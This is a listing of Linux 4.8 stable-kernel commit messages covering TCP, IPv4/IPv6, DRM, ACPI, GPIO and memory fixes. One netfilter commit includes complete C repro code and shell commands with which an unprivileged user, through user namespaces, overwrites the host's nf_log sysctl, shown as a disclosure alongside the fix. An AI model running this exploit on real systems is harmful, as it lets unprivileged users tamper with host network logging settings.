Commits · b3523a0773edd6722d35b9cdfd756337e3911df3 · Kirill Smelkov / linux

21 Nov, 2016 8 commits

tcp: fix return value for partial writes · b3523a07

Eric Dumazet authored Nov 02, 2016

[ Upstream commit 79d8665b ]

After my commit, tcp_sendmsg() might restart its loop after
processing socket backlog.

If sk_err is set, we blindly return an error, even though we
copied data to user space before.

We should instead return number of bytes that could be copied,
otherwise user space might resend data and corrupt the stream.

This might happen if another thread is using recvmsg(MSG_ERRQUEUE)
to process timestamps.

Issue was diagnosed by Soheil and Willem, big kudos to them !

Fixes: d41a69f1 ("tcp: make tcp_sendmsg() aware of socket backlog")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Cc: Soheil Hassas Yeganeh <soheil@google.com>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Tested-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

b3523a07

ipv4: allow local fragmentation in ip_finish_output_gso() · 1f49cc6f

Lance Richardson authored Nov 02, 2016

[ Upstream commit 9ee6c5dc ]

Some configurations (e.g. geneve interface with default
MTU of 1500 over an ethernet interface with 1500 MTU) result
in the transmission of packets that exceed the configured MTU.
While this should be considered to be a "bad" configuration,
it is still allowed and should not result in the sending
of packets that exceed the configured MTU.

Fix by dropping the assumption in ip_finish_output_gso() that
locally originated gso packets will never need fragmentation.
Basic testing using iperf (observing CPU usage and bandwidth)
have shown no measurable performance impact for traffic not
requiring fragmentation.

Fixes: c7ba65d7 ("net: ip: push gso skb forwarding handling down the stack")
Reported-by: Jan Tluka <jtluka@redhat.com>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

1f49cc6f

tcp: fix potential memory corruption · 842a858f

Eric Dumazet authored Nov 02, 2016

[ Upstream commit ac9e70b1 ]

Imagine initial value of max_skb_frags is 17, and last
skb in write queue has 15 frags.

Then max_skb_frags is lowered to 14 or smaller value.

tcp_sendmsg() will then be allowed to add additional page frags
and eventually go past MAX_SKB_FRAGS, overflowing struct
skb_shared_info.

Fixes: 5f74f82e ("net:Add sysctl_max_skb_frags")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com>
Cc: Håkon Bugge <haakon.bugge@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

842a858f

ip6_tunnel: Clear IP6CB in ip6tunnel_xmit() · fc3b825f

Eli Cooper authored Nov 01, 2016

[ Upstream commit 23f4ffed ]

skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.

This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.

Cc: stable@vger.kernel.org
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

fc3b825f

bgmac: stop clearing DMA receive control register right after it is set · f5f4b71d

Andy Gospodarek authored Oct 31, 2016

[ Upstream commit fcdefcca ]

Current bgmac code initializes some DMA settings in the receive control
register for some hardware and then immediately clears those settings.
Not clearing those settings results in ~420Mbps *improvement* in
throughput; this system can now receive frames at line-rate on Broadcom
5871x hardware compared to ~520Mbps today.  I also tested a few other
values but found there to be no discernible difference in CPU
utilization even if burst size and prefetching values are different.

On the hardware tested there was no need to keep the code that cleared
all but bits 16-17, but since there is a wide variety of hardware that
used this driver (I did not look at all hardware docs for hardware using
this IP block), I find it wise to move this call up and clear bits just
after reading the default value from the hardware rather than completely
removing it.

This is a good candidate for -stable >=3.14 since that is when the code
that was supposed to improve performance (but did not) was introduced.
Signed-off-by: Andy Gospodarek <gospo@broadcom.com>
Fixes: 56ceecde ("bgmac: initialize the DMA controller of core...")
Cc: Hauke Mehrtens <hauke@hauke-m.de>
Acked-by: Hauke Mehrtens <hauke@hauke-m.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

f5f4b71d

net: mangle zero checksum in skb_checksum_help() · 0c7f764d

Eric Dumazet authored Oct 29, 2016

[ Upstream commit 4f2e4ad5 ]

Sending zero checksum is ok for TCP, but not for UDP.

UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.

Simply replace such checksum by 0xffff, regardless of transport.

This error was caught on SIT tunnels, but seems generic.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

0c7f764d

net: clear sk_err_soft in sk_clone_lock() · ac22a3ba

Eric Dumazet authored Oct 28, 2016

[ Upstream commit e551c32d ]

At accept() time, it is possible the parent has a non zero
sk_err_soft, leftover from a prior error.

Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ac22a3ba

dctcp: avoid bogus doubling of cwnd after loss · 5b078dc6

Florian Westphal authored Oct 28, 2016

[ Upstream commit ce6dd233 ]

If a congestion control module doesn't provide .undo_cwnd function,
tcp_undo_cwnd_reduction() will set cwnd to

   tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1);

... which makes sense for reno (it sets ssthresh to half the current cwnd),
but it makes no sense for dctcp, which sets ssthresh based on the current
congestion estimate.

This can cause severe growth of cwnd (eventually overflowing u32).

Fix this by saving last cwnd on loss and restore cwnd based on that,
similar to cubic and other algorithms.

Fixes: e3118e83 ("net: tcp: add DCTCP congestion control algorithm")
Cc: Lawrence Brakmo <brakmo@fb.com>
Cc: Andrew Shewmaker <agshew@gmail.com>
Cc: Glenn Judd <glenn.judd@morganstanley.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

5b078dc6

18 Nov, 2016 32 commits

Linux 4.8.9 · 87657732
Greg Kroah-Hartman authored Nov 18, 2016

87657732

netfilter: fix namespace handling in nf_log_proc_dostring · 07d00beb

Jann Horn authored Sep 18, 2016

commit dbb5918c upstream.

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

07d00beb

drm/i915: Fix mismatched INIT power domain disabling during suspend · 8ef009e0

Imre Deak authored Oct 13, 2016

commit fd58753e upstream.

Currently the display INIT power domain disabling/enabling happens in a
mismatched way in the suspend/resume_early hooks respectively. This can
leave display power wells incorrectly disabled in the resume hook if the
suspend sequence is aborted for some reason resulting in the
suspend/resume hooks getting called but the suspend_late/resume_early
hooks being skipped. In particular this change fixes "Unclaimed read
from register 0x1e1204" on BYT/BSW triggered from i915_drm_resume()->
intel_pps_unlock_regs_wa() when suspending with /sys/power/pm_test set
to devices.

Fixes: 85e90679 ("drm/i915: disable power wells on suspend")
Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
Cc: David Weinehall <david.weinehall@intel.com>
Signed-off-by: Imre Deak <imre.deak@intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1476358446-11621-1-git-send-email-imre.deak@intel.com
(cherry picked from commit 4c494a57)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

8ef009e0

drm/amdgpu: fix a vm_flush fence leak · 88a45e5d

Grazvydas Ignotas authored Oct 23, 2016

commit 2d7c17be upstream.

Looks like .last_flush reference is left at teardown.
Leak reported by CONFIG_SLUB_DEBUG.

Fixes: 41d9eb2c ("drm/amdgpu: add a fence after the VM flush")
Reviewed-by: Chunming Zhou <david1.zhou@amd.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

88a45e5d

drm/amdgpu: fix fence slab teardown · 25ed6e4b

Grazvydas Ignotas authored Oct 23, 2016

commit 0f10425e upstream.

To free fences, call_rcu() is used, which calls amdgpu_fence_free()
after a grace period. During teardown, there is no guarantee all
callbacks have finished, so amdgpu_fence_slab may be destroyed before
all fences have been freed. If we are lucky, this results in some slab
warnings, if not, we get a crash in one of rcu threads because callback
is called after amdgpu has already been unloaded.

Fix it with a rcu_barrier().

Fixes: b4413535 ("drm/amdgpu: RCU protected amdgpu_fence_release")
Acked-by: Chunming Zhou <david1.zhou@amd.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

25ed6e4b

NFSv4.1: work around -Wmaybe-uninitialized warning · de5e9aa7

Arnd Bergmann authored Oct 18, 2016

commit 68a56400 upstream.

A bugfix introduced a harmless gcc warning in nfs4_slot_seqid_in_use
if we enable -Wmaybe-uninitialized again:

fs/nfs/nfs4session.c:203:54: error: 'cur_seq' may be used uninitialized in this function [-Werror=maybe-uninitialized]

gcc is not smart enough to conclude that the IS_ERR/PTR_ERR pair
results in a nonzero return value here. Using PTR_ERR_OR_ZERO()
instead makes this clear to the compiler.

The warning originally did not appear in v4.8 as it was globally
disabled, but the bugfix that introduced the warning got backported
to stable kernels which again enable it, and this is now the only
warning in the v4.7 builds.

Fixes: e09c978a ("NFSv4.1: Fix Oopsable condition in server callback races")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Cc: Trond Myklebust <trond.myklebust@primarydata.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

de5e9aa7

libceph: fix legacy layout decode with pool 0 · 18c80104

Yan, Zheng authored Nov 09, 2016

commit 3890dce1 upstream.

If your data pool was pool 0, ceph_file_layout_from_legacy()
transform that to -1 unconditionally, which broke upgrades.
We only want do that for a fully zeroed ceph_file_layout,
so that it still maps to a file_layout_t.  If any fields
are set, though, we trust the fl_pgpool to be a valid pool.

Fixes: 7627151e ("libceph: define new ceph_file_layout structure")
Link: http://tracker.ceph.com/issues/17825Signed-off-by: Yan, Zheng <zyan@redhat.com>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

18c80104

memcg: prevent memcg caches to be both OFF_SLAB & OBJFREELIST_SLAB · 53c1792b

Greg Thelen authored Nov 10, 2016

commit f773e36d upstream.

While testing OBJFREELIST_SLAB integration with pagealloc, we found a
bug where kmem_cache(sys) would be created with both CFLGS_OFF_SLAB &
CFLGS_OBJFREELIST_SLAB.  When it happened, critical allocations needed
for loading drivers or creating new caches will fail.

The original kmem_cache is created early making OFF_SLAB not possible.
When kmem_cache(sys) is created, OFF_SLAB is possible and if pagealloc
is enabled it will try to enable it first under certain conditions.
Given kmem_cache(sys) reuses the original flag, you can have both flags
at the same time resulting in allocation failures and odd behaviors.

This fix discards allocator specific flags from memcg before calling
create_cache.

The bug exists since 4.6-rc1 and affects testing debug pagealloc
configurations.

Fixes: b03a017b ("mm/slab: introduce new slab management type, OBJFREELIST_SLAB")
Link: http://lkml.kernel.org/r/1478553075-120242-1-git-send-email-thgarnie@google.comSigned-off-by: Greg Thelen <gthelen@google.com>
Signed-off-by: Thomas Garnier <thgarnie@google.com>
Tested-by: Thomas Garnier <thgarnie@google.com>
Acked-by: Christoph Lameter <cl@linux.com>
Cc: Pekka Enberg <penberg@kernel.org>
Cc: David Rientjes <rientjes@google.com>
Cc: Joonsoo Kim <iamjoonsoo.kim@lge.com>
Cc: Vladimir Davydov <vdavydov.dev@gmail.com>
Cc: Michal Hocko <mhocko@kernel.org>
Cc: Johannes Weiner <hannes@cmpxchg.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

53c1792b

mmc: mxs: Initialize the spinlock prior to using it · 02e1ee6b

Fabio Estevam authored Nov 05, 2016

commit f91346e8 upstream.

An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.

In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.

Fixes: e4243f13 (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

02e1ee6b

pinctrl: iproc: Fix iProc and NSP GPIO support · ce0702e3

Ray Jui authored Oct 17, 2016

commit 091c531b upstream.

Since commit 44a7185c ("of/platform: Add common method to populate
default bus"), ARM64 platform devices are populated at the
arch_initcall_sync level; as a result, the platform_driver_probe calls
in both the iProc and NSP GPIO drivers fail with -ENODEV since by that
time the platform device was not yet registered.

Replace platform_driver_probe with platform_driver_register, that allow
the device to be register later

Fixes: 44a7185c ("of/platform: Add common method to populate default bus")
Signed-off-by: Ray Jui <ray.jui@broadcom.com>
Tested-by: Eric Anholt <eric@anholt.net>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ce0702e3

ASoC: sun4i-codec: return error code instead of NULL when create_card fails · 320244ac

Chen-Yu Tsai authored Oct 31, 2016

commit 85915b63 upstream.

When sun4i_codec_create_card fails, we do not assign a proper error
code to the return value. The return value would be 0 from the previous
function call, or we would have bailed out sooner. This would confuse
the driver core into thinking the device probe succeeded, when in fact
it didn't, leaving various devres based resources lingering.

Make the create_card function pass back a meaningful error code, and
assign it to the return value.

Fixes: 45fb6b6f ("ASoC: sunxi: add support for the on-chip codec on
		      early Allwinner SoCs")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

320244ac

ASoC: Intel: Skylake: Always acquire runtime pm ref on unload · 2140d4fd

Lukas Wunner authored Oct 20, 2016

commit 6d13f62d upstream.

skl_probe() releases a runtime pm ref unconditionally wheras
skl_remove() acquires one only if the device is wakeup capable.
Thus if the device is not wakeup capable, unloading and reloading
the module will result in the refcount being decreased below 0.
Fix it.

Fixes: d8c2dab8 ("ASoC: Intel: Add Skylake HDA audio driver")
Signed-off-by: Lukas Wunner <lukas@wunner.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

2140d4fd

gpio: of: fix GPIO drivers with multiple gpio_chip for a single node · 5037fdbc

Masahiro Yamada authored Oct 25, 2016

commit c7e9d398 upstream.

Sylvain Lemieux reports the LPC32xx GPIO driver is broken since
commit 762c2e46 ("gpio: of: remove of_gpiochip_and_xlate() and
struct gg_data").  Probably, gpio-etraxfs.c and gpio-davinci.c are
broken too.

Those drivers register multiple gpio_chip that are associated to a
single OF node, and their own .of_xlate() checks if the passed
gpio_chip is valid.

Now, the problem is of_find_gpiochip_by_node() returns the first
gpio_chip found to match the given node.  So, .of_xlate() fails,
except for the first GPIO bank.

Reverting the commit could be a solution, but I do not want to go
back to the mess of struct gg_data.  Another solution here is to
take the match by a node pointer and the success of .of_xlate().
It is a bit clumsy to call .of_xlate twice; for gpio_chip matching
and for really getting the gpio_desc index.  Perhaps, our long-term
goal might be to convert the drivers to single chip registration,
but this commit will solve the problem until then.

Fixes: 762c2e46 ("gpio: of: remove of_gpiochip_and_xlate() and struct gg_data")
Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Reported-by: Sylvain Lemieux <slemieux.tyco@gmail.com>
Tested-by: David Lechner <david@lechnology.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

5037fdbc

gpio/mvebu: Use irq_domain_add_linear · 7a9239fd

Jason Gunthorpe authored Oct 19, 2016

commit 812d4788 upstream.

This fixes the irq allocation in this driver to not print:
 irq: Cannot allocate irq_descs @ IRQ34, assuming pre-allocated
 irq: Cannot allocate irq_descs @ IRQ66, assuming pre-allocated

Which happens because the driver already called irq_alloc_descs()
and so the change to use irq_domain_add_simple resulted in calling
irq_alloc_descs() twice.

Modernize the irq allocation in this driver to use the
irq_domain_add_linear flow directly and eliminate the use of
irq_domain_add_simple/legacy

Fixes: ce931f57 ("gpio/mvebu: convert to use irq_domain_add_simple()")
Signed-off-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

7a9239fd

batman-adv: Modify neigh_list only with rcu-list functions · 6de98e87

Sven Eckelmann authored Sep 29, 2016

commit 9ca488dd upstream.

The batadv_hard_iface::neigh_list is accessed via rcu based primitives.
Thus all operations done on it have to fulfill the requirements by RCU. So
using non-RCU mechanisms like hlist_add_head is not allowed because it
misses the barriers required to protect concurrent readers when accessing
the data behind the pointer.

Fixes: cef63419 ("batman-adv: add list of unique single hop neighbors per hard-interface")
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Acked-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

6de98e87

ACPI/PCI: pci_link: Include PIRQ_PENALTY_PCI_USING for ISA IRQs · a3f000ce

Sinan Kaya authored Oct 24, 2016

commit 98756f53 upstream.

Commit 103544d8 ("ACPI,PCI,IRQ: reduce resource requirements")
replaced the addition of PIRQ_PENALTY_PCI_USING in acpi_pci_link_allocate()
with an addition in acpi_irq_pci_sharing_penalty(), but f7eca374
("ACPI,PCI,IRQ: separate ISA penalty calculation") removed the use
of acpi_irq_pci_sharing_penalty() for ISA IRQs.

Therefore, PIRQ_PENALTY_PCI_USING is missing from ISA IRQs used by
interrupt links.  Include that penalty by adding it in the
acpi_pci_link_allocate() path.

Fixes: f7eca374 (ACPI,PCI,IRQ: separate ISA penalty calculation)
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

a3f000ce

ACPI/PCI: pci_link: penalize SCI correctly · 6c76dd0c

Sinan Kaya authored Oct 24, 2016

commit f1caa61d upstream.

Ondrej reported that IRQs stopped working in v4.7 on several
platforms.  A typical scenario, from Ondrej's VT82C694X/694X, is:

ACPI: Using PIC for interrupt routing
ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 10 *11 12 14 15)
ACPI: No IRQ available for PCI Interrupt Link [LNKA]
8139too 0000:00:0f.0: PCI INT A: no GSI

We're using PIC routing, so acpi_irq_balance == 0, and LNKA is already
active at IRQ 11. In that case, acpi_pci_link_allocate() only tries
to use the active IRQ (IRQ 11) which also happens to be the SCI.

We should penalize the SCI by PIRQ_PENALTY_PCI_USING, but
irq_get_trigger_type(11) returns something other than
IRQ_TYPE_LEVEL_LOW, so we penalize it by PIRQ_PENALTY_ISA_ALWAYS
instead, which makes acpi_pci_link_allocate() assume the IRQ isn't
available and give up.

Add acpi_penalize_sci_irq() so platforms can tell us the SCI IRQ,
trigger, and polarity directly and we don't have to depend on
irq_get_trigger_type().

Fixes: 103544d8 (ACPI,PCI,IRQ: reduce resource requirements)
Link: http://lkml.kernel.org/r/201609251512.05657.linux@rainbow-software.orgReported-by: Ondrej Zary <linux@rainbow-software.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

6c76dd0c

ACPI/PCI/IRQ: assign ISA IRQ directly during early boot stages · 86c71166

Sinan Kaya authored Oct 24, 2016

commit eeaed4bb upstream.

We do not want to store the SCI penalty in the acpi_isa_irq_penalty[]
table because acpi_isa_irq_penalty[] only holds ISA IRQ penalties and
there's no guarantee that the SCI is an ISA IRQ.  We add in the SCI
penalty as a special case in acpi_irq_get_penalty().

But if we called acpi_penalize_isa_irq() or acpi_irq_penalty_update()
for an SCI that happened to be an ISA IRQ, they stored the SCI
penalty (part of the acpi_irq_get_penalty() return value) in
acpi_isa_irq_penalty[].  Subsequent calls to acpi_irq_get_penalty()
returned a penalty that included *two* SCI penalties.

Fixes: 103544d8 (ACPI,PCI,IRQ: reduce resource requirements)
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

86c71166

ACPI / APEI: Fix incorrect return value of ghes_proc() · ad185d92

Punit Agrawal authored Oct 18, 2016

commit 806487a8 upstream.

Although ghes_proc() tests for errors while reading the error status,
it always return success (0). Fix this by propagating the return
value.

Fixes: d334a491 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-of-by: Punit Agrawal <punit.agrawa.@arm.com>
Tested-by: Tyler Baicar <tbaicar@codeaurora.org>
Reviewed-by: Borislav Petkov <bp@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ad185d92

mmc: sdhci-msm: Fix error return code in sdhci_msm_probe() · b55ebc89

Wei Yongjun authored Oct 26, 2016

commit d1f63f0c upstream.

Fix to return a negative error code from the platform_get_irq_byname()
error handling case instead of 0, as done elsewhere in this function.

Fixes: ad81d387 ("mmc: sdhci-msm: Add support for UHS cards")
Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com>
Acked-by: Adrian Hunter <adrian.hunter@intel.com>
Acked-by: Georgi Djakov <georgi.djakov@linaro.org>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

b55ebc89

i40e: fix call of ndo_dflt_bridge_getlink() · 85284c08

Huaibin Wang authored Sep 26, 2016

commit 599b076d upstream.

Order of arguments is wrong.
The wrong code has been introduced by commit 7d4f8d87, but is compiled
only since commit 9df70b66.

Note that this may break netlink dumps.

Fixes: 9df70b66 ("i40e: Remove incorrect #ifdef's")
Fixes: 7d4f8d87 ("switchdev; add VLAN support for port's bridge_getlink")
CC: Carolyn Wyborny <carolyn.wyborny@intel.com>
Signed-off-by: Huaibin Wang <huaibin.wang@6wind.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Tested-by: Andrew Bowers <andrewx.bowers@intel.com>
Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

85284c08

hwrng: core - Don't use a stack buffer in add_early_randomness() · 1242c9df

Andrew Lutomirski authored Oct 17, 2016

commit 6d4952d9 upstream.

hw_random carefully avoids using a stack buffer except in
add_early_randomness().  This causes a crash in virtio_rng if
CONFIG_VMAP_STACK=y.
Reported-by: Matt Mullins <mmullins@mmlx.us>
Tested-by: Matt Mullins <mmullins@mmlx.us>
Fixes: d3cc7996 ("hwrng: fetch randomness only after device init")
Signed-off-by: Andy Lutomirski <luto@kernel.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

1242c9df

lib/genalloc.c: start search from start of chunk · c1a2ada7

Daniel Mentz authored Oct 27, 2016

commit 62e931fa upstream.

gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.

The shortcut

	if (size > atomic_read(&chunk->avail))
		continue;

makes the loop skip over chunks that do not have enough bytes left to
fulfill the request.  There are two situations, though, where an
allocation might still fail:

(1) The available memory is not contiguous, i.e.  the request cannot
    be fulfilled due to external fragmentation.

(2) A race condition.  Another thread runs the same code concurrently
    and is quicker to grab the available memory.

In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed.  This return value is then assigned to
start_bit.  The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched.  Today, the code fails to reset start_bit to 0.  As a
result, prefixes of subsequent chunks are ignored.  Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.

Fixes: 7f184275 ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.comSigned-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

c1a2ada7

s390/dumpstack: restore reliable indicator for call traces · 06bb5ebe

Heiko Carstens authored Oct 17, 2016

commit d0208639 upstream.

Before merging all different stack tracers the call traces printed had
an indicator if an entry can be considered reliable or not.
Unreliable entries were put in braces, reliable not. Currently all
lines contain these extra braces.

This patch restores the old behaviour by adding an extra "reliable"
parameter to the callback functions. Only show_trace makes currently
use of it.

Before:
[    0.804751] Call Trace:
[    0.804753] ([<000000000017d0e0>] try_to_wake_up+0x318/0x5e0)
[    0.804756] ([<0000000000161d64>] create_worker+0x174/0x1c0)

After:
[    0.804751] Call Trace:
[    0.804753] ([<000000000017d0e0>] try_to_wake_up+0x318/0x5e0)
[    0.804756]  [<0000000000161d64>] create_worker+0x174/0x1c0

Fixes: 758d39eb ("s390/dumpstack: merge all four stack tracers")
